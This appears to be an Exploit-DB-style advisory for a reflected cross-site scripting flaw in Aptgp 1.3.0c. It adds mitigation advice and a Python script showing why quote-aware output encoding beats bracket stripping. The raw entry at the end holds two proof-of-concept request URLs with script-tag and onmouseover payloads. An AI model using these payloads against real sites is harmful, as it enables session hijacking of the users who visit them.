Vendor: Aptgp
By: indoushka
CVSS: 7.5 (HIGH)
Type: Cross Site Scripting
CWE: 79
Product Name: Aptgp
Affected Version From: 1.3.0c
Affected Version To: 1.3.0c
Patch Exists: NO
Related CWE: N/A
CPE: a:aptgp:aptgp:1.3.0c
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux
2009

Aptgp.v1.3.0c Cross Site Scripting Vulnerability

Aptgp v1.3.0c is vulnerable to cross-site scripting (XSS). An attacker can inject JavaScript into the webm_email parameter of the webm_stats.php page; the second request in the advisory shows the same behaviour in the webm_password parameter. The injected code executes in the victim's browser when they visit the page and can be used to steal the victim's session cookie, allowing the attacker to hijack the user's session.

Mitigation:

Use input validation to prevent XSS attacks: validate and filter all user-supplied input before the application uses it. In addition, encode output so that injected markup is not executed in the browser.
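Why output encoding is needed in addition to filtering, checked against the two request URLs from the raw advisory (an added example, not code from Aptgp or the advisory). The `FORM` template, and the assumption that both parameters are reflected into quoted `value` attributes, are hypothetical because the page does not show the application's markup.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# The two request URLs exactly as listed in the advisory.
POC_URLS = [
    'http://127.0.0.1/aptgp/webm_stats.php?process=webm_login&webm_email=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&webm_password=hacked-by-indoushka',
    'http://127.0.0.1/aptgp/webm_stats.php?process=webm_login&webm_email=indoushka@hotmail.com&webm_password="+onmouseover=alert(213771818860)+',
]
# Hypothetical login form (assumption): both values land in quoted attributes.
FORM = ('<input type="text" name="webm_email" value="{email}">'
        '<input type="password" name="webm_password" value="{password}">')

class Audit(HTMLParser):
    """Records script elements and on* event-handler attributes in markup."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script element")
        self.findings += [f"{name} handler" for name, _ in attrs
                          if name.startswith("on")]

def raw(value):
    """No defence: the value is reflected as received."""
    return value

def strip_angles(value):
    """Incomplete filter: removes < and > but leaves quotes alone."""
    return value.replace("<", "").replace(">", "")

def encode(value):
    """Output encoding for a quoted attribute: & < > " ' become entities."""
    return escape(value, quote=True)

def findings(url, defence):
    """Render the form with the URL's parameters and list active content."""
    query = parse_qs(urlsplit(url).query)
    page = FORM.format(email=defence(query["webm_email"][0]),
                       password=defence(query["webm_password"][0]))
    audit = Audit()
    audit.feed(page)
    audit.close()
    return audit.findings

if __name__ == "__main__":
    for defence in (raw, strip_angles, encode):
        for number, url in enumerate(POC_URLS, 1):
            print(defence.__name__, f"request {number}:", findings(url, defence))
```

Removing angle brackets still leaves an event-handler attribute for the second request, because that value only needs a double quote to leave the attribute; encoding quotes as well leaves no active content for either request.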

Exploit-DB raw data:

========================================================================================                  
| # Title    : Aptgp.v1.3.0c Cross Site Scripting Vulnerability                        |
| # Author   : indoushka                                                               |
| # email    : indoushka@hotmail.com                                                   |
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       
| # Web Site : www.iq-ty.com                                                           |
| # Script   : Aptgp.v1.3.0c                                                           |
| # Tested on: Windows SP2 Français V.(Pnx2 2.0) + Linux Français v.(9.4 Ubuntu)       |
| # Bug      : XSS                                                                     | 
======================      Exploit By indoushka       =================================
| # Exploit  : 
| 
| 1- http://127.0.0.1/aptgp/webm_stats.php?process=webm_login&webm_email=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&webm_password=hacked-by-indoushka
| 2- http://127.0.0.1/aptgp/webm_stats.php?process=webm_login&webm_email=indoushka@hotmail.com&webm_password="+onmouseover=alert(213771818860)+
|  
================================   Dz-Ghost Team   ========================================
Greetz : Exploit-db Team (loneferret+Exploits+dookie2000ca)
-------------------------------------------------------------------------------------------